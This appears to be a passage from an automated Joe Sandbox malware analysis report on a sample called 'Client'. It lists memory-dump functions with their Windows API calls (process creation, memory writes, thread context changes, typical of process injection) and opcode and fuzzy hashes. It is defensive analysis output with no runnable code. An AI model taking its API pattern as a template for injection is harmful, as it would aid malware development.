                                                  • Opcode Fuzzy Hash: 9472b4700be2db3f49c5034473cbbaaaa1f00f9570c26a5a17bf4a0b7a1c95b7
                                                  • Instruction Fuzzy Hash: 63211575D042089ECB10DFAAD884BEFFBF4AF89324F14891AD519A7240C7759A44CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 0240B357
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.950989279.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_2400000_Client.jbxd
                                                  Similarity
                                                  • API ID: MemoryVirtualWrite
                                                  • String ID:
                                                  • API String ID: 3527976591-0
                                                  • Opcode ID: 7eb5e8ee77a7f4769965c92fa621f7f2081b2839971a5436b3d15077e7a5fb48
                                                  • Instruction ID: f4d29e0343a2637a49e73f8a96d490aa579afc53bd2cfdb847e0263d97e31f73
                                                  • Opcode Fuzzy Hash: 7eb5e8ee77a7f4769965c92fa621f7f2081b2839971a5436b3d15077e7a5fb48
                                                  • Instruction Fuzzy Hash: 19212771D042099FCB10DFAAD884BDFFBF4EF48224F14882AD519A7250C775A944CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 003225BC
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949465797.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_320000_Client.jbxd
                                                  Similarity
                                                  • API ID: InformationQuerySystem
                                                  • String ID:
                                                  • API String ID: 3562636166-0
                                                  • Opcode ID: 14a11286ff351d4479d0eccfe797034d26f935459180b81c3a49f5c257121cb0
                                                  • Instruction ID: 71e4e461419c4d995621e58eee3463da9d80d0137b4905a4d463ea482189c2e6
                                                  • Opcode Fuzzy Hash: 14a11286ff351d4479d0eccfe797034d26f935459180b81c3a49f5c257121cb0
                                                  • Instruction Fuzzy Hash: 8F113671D042089FCB10DFAAD848BEFFBF4AF49324F14882AD519A7240C774A944CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • NtResumeThread.NTDLL(?,?), ref: 0037F2B6
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949681708.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_370000_Client.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 72523f57d7c7de1ff9b300c6373d3b0c3d9053355922708e58d51d855330ccc5
                                                  • Instruction ID: 7d0aceebc6a2d618a0566771e85e898b8bee0850288954ec003e824da3f68b5f
                                                  • Opcode Fuzzy Hash: 72523f57d7c7de1ff9b300c6373d3b0c3d9053355922708e58d51d855330ccc5
                                                  • Instruction Fuzzy Hash: 311117B5D042098EDB10DFAAD84879FFBF4BF49224F51892AD519B7340DB78A904CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • NtSetContextThread.NTDLL(?,?), ref: 0037DDFD
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949681708.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_370000_Client.jbxd
                                                  Similarity
                                                  • API ID: ContextThread
                                                  • String ID:
                                                  • API String ID: 1591575202-0
                                                  • Opcode ID: 6334822a8c5617ed43f95b20bfa7401ff5ab836b5864b9cf5823ecc92c381f82
                                                  • Instruction ID: f743c224d86d7a44416fe38c1a731dd1633912cb615f867e7525b108f8b11ae2
                                                  • Opcode Fuzzy Hash: 6334822a8c5617ed43f95b20bfa7401ff5ab836b5864b9cf5823ecc92c381f82
                                                  • Instruction Fuzzy Hash: 111128719042088BDB20DFA9D8497DFFBF5AF89324F15881AD519B7340CB79A944CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949806309.00000000004A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_4a0000_Client.jbxd
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: bb6608b5b66d3660c4dfa410be2c4f4ea754efbb760eafd2ef1f0586c0e5566c
                                                  • Instruction ID: a8d0f5aeca7af8a5b221495a8b32772812c14f7d51e53a1fd8eda0f249e60e76
                                                  • Opcode Fuzzy Hash: bb6608b5b66d3660c4dfa410be2c4f4ea754efbb760eafd2ef1f0586c0e5566c
                                                  • Instruction Fuzzy Hash: 431128719042098BDB10DFA9D8497DFFBF4AF89324F14881AD519B7340CB79A944CB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949465797.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_320000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ffff
                                                  • API String ID: 0-3827681309
                                                  • Opcode ID: 19ae5cfa208459f9feb9dfe356ebccde0b37977afaa91efc202ee006e735207e
                                                  • Instruction ID: 1c2dce31e95df97f7410d828e94ad25d290c5fa1f28fd1dff56d83ef2d52e368
                                                  • Opcode Fuzzy Hash: 19ae5cfa208459f9feb9dfe356ebccde0b37977afaa91efc202ee006e735207e
                                                  • Instruction Fuzzy Hash: 0491D274B143159FCB05DFA4E8989AEBBB6FF88310F148529E501EB351DB70AD09CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949465797.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_320000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 54824909f8cfd2cdd4b70e9447c5a7392958e5044ff993acd13028575c138b4f
                                                  • Instruction ID: c891ff62235fbbbaad13db61b5395402e522ab9e1a681297bcc777dbc6deb386
                                                  • Opcode Fuzzy Hash: 54824909f8cfd2cdd4b70e9447c5a7392958e5044ff993acd13028575c138b4f
                                                  • Instruction Fuzzy Hash: 1FC12934A10619DFCB15CF64D88499DFBB2FF89304B6AC655E845AB321DB71EC82CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949465797.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_320000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 12723b2508864476fbc9664a90f06b2145871ce1e9c865c76feced5e52005421
                                                  • Instruction ID: 6a7ccdc27bbd4b92d9a836a76506c99d44314eb14ca2eaa81453a1b8e8a9ae67
                                                  • Opcode Fuzzy Hash: 12723b2508864476fbc9664a90f06b2145871ce1e9c865c76feced5e52005421
                                                  • Instruction Fuzzy Hash: 85A11834E10629DFCB15CF64D88499DFBB2FF89304B6AC655E845AB321D771E882CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.950546902.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_870000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c15aa229e8323d7e70d5a5e19df798a8d782817ee98ba92246313d3f9d3d7a88
                                                  • Instruction ID: e9e45c7dfed553c6926a4dc90d8b448c04c88c4d4861f30185b29d8df56aa619
                                                  • Opcode Fuzzy Hash: c15aa229e8323d7e70d5a5e19df798a8d782817ee98ba92246313d3f9d3d7a88
                                                  • Instruction Fuzzy Hash: 9051F636E041258FC714EF64C9506ADB7B3FB85328F14946AC80BEB3A9DB309E05C790
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949465797.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_320000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3aaf152b1b0ea7dfd14548072655a3e27f50526657b6ed7d6ab98e63825763e7
                                                  • Instruction ID: ff73b1a88a0824f2b1948b16c27b4e3b20920286e109c8d55a5a90902ea61049
                                                  • Opcode Fuzzy Hash: 3aaf152b1b0ea7dfd14548072655a3e27f50526657b6ed7d6ab98e63825763e7
                                                  • Instruction Fuzzy Hash: D4414971A0C2D55FC703DF749C605AB7FB29F93304B6495DBC0809F6A7CA20990AC791
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.959423010.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_4e60000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @~4$@~4$\}4$\}4
                                                  • API String ID: 0-649672702
                                                  • Opcode ID: e8ccb95f50abc627657bf6a794040a4fe210e1134c7c63899a8eadbabb0653d7
                                                  • Instruction ID: 761f077ca4f9fdd810131dc63f43f764b9eff7eec1846d5b51db87f857668f58
                                                  • Opcode Fuzzy Hash: e8ccb95f50abc627657bf6a794040a4fe210e1134c7c63899a8eadbabb0653d7
                                                  • Instruction Fuzzy Hash: 800321B4E002168FC750EF74D98CB9DB7F5AB48348F1054AA981DE3B59DB386E448F62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph: function 37ea88-37edf6, calls CreateProcessW (rendered graph omitted)
                                                  APIs
                                                  • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0037EC9E
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949681708.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_370000_Client.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 5540fd5f6189b4151f03acc993bbcc3cd78d41734738554e916521994b0bb77c
                                                  • Instruction ID: 2ff148053f27b607dc3e1a8b52b84c9e5a688a23b896d141a70a41387aa93cfb
                                                  • Opcode Fuzzy Hash: 5540fd5f6189b4151f03acc993bbcc3cd78d41734738554e916521994b0bb77c
                                                  • Instruction Fuzzy Hash: 42A16971D006198FCF21CFA9CD446DDBBB2BF48304F2585A9D909BB240DB746A89CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  Control-flow graph (rendered as an image in the original report; legend: Executed / Not Executed): basic blocks 322a98-322b52; block 322a98-322b19 calls VirtualProtect.
                                                  APIs
                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00322B0C
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949465797.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_320000_Client.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: 8cb93ca4ed6f706c5c14272f4ea5bd0370f0d4fa147d0b252b6226b1fedd52e7
                                                  • Instruction ID: 101c16c4ed6328fe1ba28988d67901faf83db70624b6e5fa559a1b59c65781a6
                                                  • Opcode Fuzzy Hash: 8cb93ca4ed6f706c5c14272f4ea5bd0370f0d4fa147d0b252b6226b1fedd52e7
                                                  • Instruction Fuzzy Hash: 48211571D042099FDB10DFAAD844BEFFBF4EF88324F55882AD519A7240D778A944CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • VirtualAllocExNuma.KERNELBASE(?,00000000,?,?,?,?), ref: 004A37F1
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949806309.00000000004A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_4a0000_Client.jbxd
                                                  Similarity
                                                  • API ID: AllocNumaVirtual
                                                  • String ID:
                                                  • API String ID: 4233825816-0
                                                  • Opcode ID: 8cf6894fd1e1be2a065786fa591053424faf415eeeca5e95c6fbe6cafcb67cbc
                                                  • Instruction ID: d6e06dd35f1b6dbb920053acbbac46b70e86f7426ea586531836ca39493887b9
                                                  • Opcode Fuzzy Hash: 8cf6894fd1e1be2a065786fa591053424faf415eeeca5e95c6fbe6cafcb67cbc
                                                  • Instruction Fuzzy Hash: 871189719002089FCB10CFA9C808BDFBFF5AF49324F10881AE515A7240C779A914CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949465797.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_320000_Client.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle
                                                  • String ID:
                                                  • API String ID: 2962429428-0
                                                  • Opcode ID: 18d6a1531d061ec553532c03603bdb69890b8605ca7ccd0257636326f9de8f3d
                                                  • Instruction ID: e992969cfdbbe6d1f03427b7e892ec88cb6541ffefac9b68ca783f52f898447b
                                                  • Opcode Fuzzy Hash: 18d6a1531d061ec553532c03603bdb69890b8605ca7ccd0257636326f9de8f3d
                                                  • Instruction Fuzzy Hash: 50117C75C042498FDB10CFA9D8497EFBBF0AF88324F158829C559B7340C778AA44CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949465797.0000000000320000.00000040.00000800.00020000.00000000.sdmp, Offset: 00320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_320000_Client.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle
                                                  • String ID:
                                                  • API String ID: 2962429428-0
                                                  • Opcode ID: 1fcd20eab5769a00969dc562a616195de06422b0f411b3c6a45b48cc9965a998
                                                  • Instruction ID: a7b41fec961007b3b80d45126e050def638fc8f05ebbebdcdeaf99a95fdce0de
                                                  • Opcode Fuzzy Hash: 1fcd20eab5769a00969dc562a616195de06422b0f411b3c6a45b48cc9965a998
                                                  • Instruction Fuzzy Hash: 2E115B719042498FDB10DFA9D8497EFFBF4AF88224F158829C519A7340DB78A944CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.959423010.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_4e60000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9a6ebf76ad99bc95e3cad1529bba98e88682ee1d765ea0163f2d9e8a63786fd3
                                                  • Instruction ID: db00aafd562f861542900ae5a6f73edca2eadc03949b9072d7eeac47a395fedb
                                                  • Opcode Fuzzy Hash: 9a6ebf76ad99bc95e3cad1529bba98e88682ee1d765ea0163f2d9e8a63786fd3
                                                  • Instruction Fuzzy Hash: 9D915CB1F006288BEB29CE1DCDD06ACF7B5BB58241F4851ACD51AA7315E6345F89CF14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.959423010.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_4e60000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b567cf89560d81dc7f1d2b0c8d1facffe998c812319dca60d1f8bfac72bd8ae9
                                                  • Instruction ID: 2c8a2195d20092d3d01df16e2f4b48a564b08ac98ccc59840cca7960a7adef75
                                                  • Opcode Fuzzy Hash: b567cf89560d81dc7f1d2b0c8d1facffe998c812319dca60d1f8bfac72bd8ae9
                                                  • Instruction Fuzzy Hash: 1F411DB1F006288BDB2DCE1DCDD06ACB7B5BB58245F4882ACC51A9B356D6345F8DCB14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949644804.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_360000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6260437a91e088dda03dc627915f5fd00f854671f8ab8bd1437e56e46fa17855
                                                  • Instruction ID: 855e14be79dd0a9433205a75671284d99da7b1c577b3494d369c101362810bc3
                                                  • Opcode Fuzzy Hash: 6260437a91e088dda03dc627915f5fd00f854671f8ab8bd1437e56e46fa17855
                                                  • Instruction Fuzzy Hash: E501F574B081049FD3089B69EC5499B7BEBFBC5354725E87AD00ADBB9CCB31AC018750
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949644804.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_360000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 285da5d66f60ff60284aa7aa77f44c29a19f39f11ec19112b98eb143c0a0690c
                                                  • Instruction ID: 2eec5a0d7581195f6743a41190677d4527818b89906b57acbb7c93582a37c191
                                                  • Opcode Fuzzy Hash: 285da5d66f60ff60284aa7aa77f44c29a19f39f11ec19112b98eb143c0a0690c
                                                  • Instruction Fuzzy Hash: 8F0124357055048FD7058B25EC4099B7BABEBC6351B29C53AE1068BB6CDB32EC02CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949644804.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_360000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 74227ba82aa7d6794323b1decd2ab694b2d465cc13c88ee7a0a74091acb424cf
                                                  • Instruction ID: 40ee935845d625122e8a1e3215918685ceed437b2c614820770151338d72f22d
                                                  • Opcode Fuzzy Hash: 74227ba82aa7d6794323b1decd2ab694b2d465cc13c88ee7a0a74091acb424cf
                                                  • Instruction Fuzzy Hash: 4701B5397051144BE309DB65EC8056BFBA7E7D5360724D426D409D775CEB309C428B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949944018.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_4e0000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cf84e9153d3c63be67edc179a9fac52395854ce7b6fdcc07d41c850fd98b354f
                                                  • Instruction ID: bcd4b1b242455f793e707559707f508895ca6c955d25522dc3d200f1f80a473b
                                                  • Opcode Fuzzy Hash: cf84e9153d3c63be67edc179a9fac52395854ce7b6fdcc07d41c850fd98b354f
                                                  • Instruction Fuzzy Hash: B401F9347491744FC305C629ED804967BABA7C625431992B7D505CB39DCA65DC0687E4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.959423010.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_4e60000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 39baec1f8e151023846e00f327fd0181ba44c28f9807a4f7eb66a6b65aeb0881
                                                  • Instruction ID: 259ee5c22368c9d926119d66ce1f2de8d2677acaaa0f5b200551f86b11799390
                                                  • Opcode Fuzzy Hash: 39baec1f8e151023846e00f327fd0181ba44c28f9807a4f7eb66a6b65aeb0881
                                                  • Instruction Fuzzy Hash: 9F2103B8D10218CFCB25DF60EC8949CBBB4FB48384F10549AD40AAB2A5EB746B85CF40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949644804.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_360000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5994845f8602f5a8b487a798430513805bc2f9e67e3126d4f91773f7de95b833
                                                  • Instruction ID: 95dbf2c17370573c00c880b7177474aecf0c0dce607b37c8da9bfd0d3b10a56e
                                                  • Opcode Fuzzy Hash: 5994845f8602f5a8b487a798430513805bc2f9e67e3126d4f91773f7de95b833
                                                  • Instruction Fuzzy Hash: 4301A235B054188B9309AB69F99086A7BEBE7C5310321D03BE10A9B758DE31DD41CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.959423010.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_4e60000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bdb6c7d58435c5ba30decaaf5555a71e142bc9e49584c80c6fa198e50435ee20
                                                  • Instruction ID: 3158e00da143d869ab7fd086ab49a6fbba2a4480f9c7b9f7e8a34f319c0794ca
                                                  • Opcode Fuzzy Hash: bdb6c7d58435c5ba30decaaf5555a71e142bc9e49584c80c6fa198e50435ee20
                                                  • Instruction Fuzzy Hash: 5801F93AB040645B8308CBAEF9418AAFFDEA7C9121304E027E508D73ADC634DC05C7A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949944018.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_4e0000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f5321b82091ece8d9459979ba43909f61e11709e15bfdde6bf7638ea1a5c5235
                                                  • Instruction ID: 4b260c58dff3d4b4eba253f3aaeda8c040da81e66cb8936f6be8683650fa6e10
                                                  • Opcode Fuzzy Hash: f5321b82091ece8d9459979ba43909f61e11709e15bfdde6bf7638ea1a5c5235
                                                  • Instruction Fuzzy Hash: F9F028347050448BC304DB39EA9085137ABE7C221432CC676C10A8B7A8DF75DC02CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.959423010.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_4e60000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7bd2db5d0f107d29907926b1622a9e4647fe3fa6490002e2e85c683c69e7fc30
                                                  • Instruction ID: 65bd72bbd224eec453da0a3a438cedddfbf7ca95b1c4e3e685209832a3cafcd7
                                                  • Opcode Fuzzy Hash: 7bd2db5d0f107d29907926b1622a9e4647fe3fa6490002e2e85c683c69e7fc30
                                                  • Instruction Fuzzy Hash: 4D11A778D10218CFCB15DF60ED9849CBBB5BB49344F10559AD409AB3A4DB746F85CF40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.950546902.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_870000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8ea28cc0b30923c8a39673aab6fdea27f133148ef048b541e51bc03d09e8062f
                                                  • Instruction ID: df1df00e38d289450ed22fb7bf32854f3fea2520c3bfe46f8803b8348b38bfe7
                                                  • Opcode Fuzzy Hash: 8ea28cc0b30923c8a39673aab6fdea27f133148ef048b541e51bc03d09e8062f
                                                  • Instruction Fuzzy Hash: B9F0B47CB05564978308D728EE444667BABAFD5604318957AD519CB75CDB32DC0187D0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.959423010.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_4e60000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 93c7d80460652dc4d7d8ba40bc4027c65e08affe73345d14c487d799c489e6c2
                                                  • Instruction ID: b1f3b8ea236c8c5f79170e07a7073d3c502d5087eea34250506b6d6013c89248
                                                  • Opcode Fuzzy Hash: 93c7d80460652dc4d7d8ba40bc4027c65e08affe73345d14c487d799c489e6c2
                                                  • Instruction Fuzzy Hash: 68F0593AB150018BC344DB2DED1486A7BE79BC9260719C0BBD10AC734CEB30EC028390
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.959423010.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_4e60000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cc26aef82aded4c4b11ec1caccb50fdb6b6479c09ec5bf8dac9e6a6ad2e580c9
                                                  • Instruction ID: 6835d89d1a5532c8e9824b1a4fc7027ee305dd206b5bcfd09c387aa46aef0d9c
                                                  • Opcode Fuzzy Hash: cc26aef82aded4c4b11ec1caccb50fdb6b6479c09ec5bf8dac9e6a6ad2e580c9
                                                  • Instruction Fuzzy Hash: A411F878E10218DFCB14EFA0D84849CB7B5FF49304F10419AD40AAB768DB346E84CF41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.959423010.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_4e60000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b1150296acdac88daf2d3c6b541fb56d471c58212e64331af3d2dbdc1f7d6b09
                                                  • Instruction ID: 4c9ec9d37f6f72643960028794018f769c70075d81972d13dc7b64b82d2bd9f2
                                                  • Opcode Fuzzy Hash: b1150296acdac88daf2d3c6b541fb56d471c58212e64331af3d2dbdc1f7d6b09
                                                  • Instruction Fuzzy Hash: DC11E678D142289FCB24EF64DC59698B7B1FB89300F1095D9D40AA7364DB302E85CF41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.959423010.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_4e60000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d918e3c5e4a8f7689d6affd5b173bd01e733b95d2c2ec186ce1f85d4db5c77c6
                                                  • Instruction ID: c21f8532a751039d3bb50421ed70bde2bd4c9c7cb2f54a069bee03fb4d05a0db
                                                  • Opcode Fuzzy Hash: d918e3c5e4a8f7689d6affd5b173bd01e733b95d2c2ec186ce1f85d4db5c77c6
                                                  • Instruction Fuzzy Hash: C111E6789002699FCB66EF60EC9959DB7B5FF49300F1085EAD40AA7365DB306E80CF01
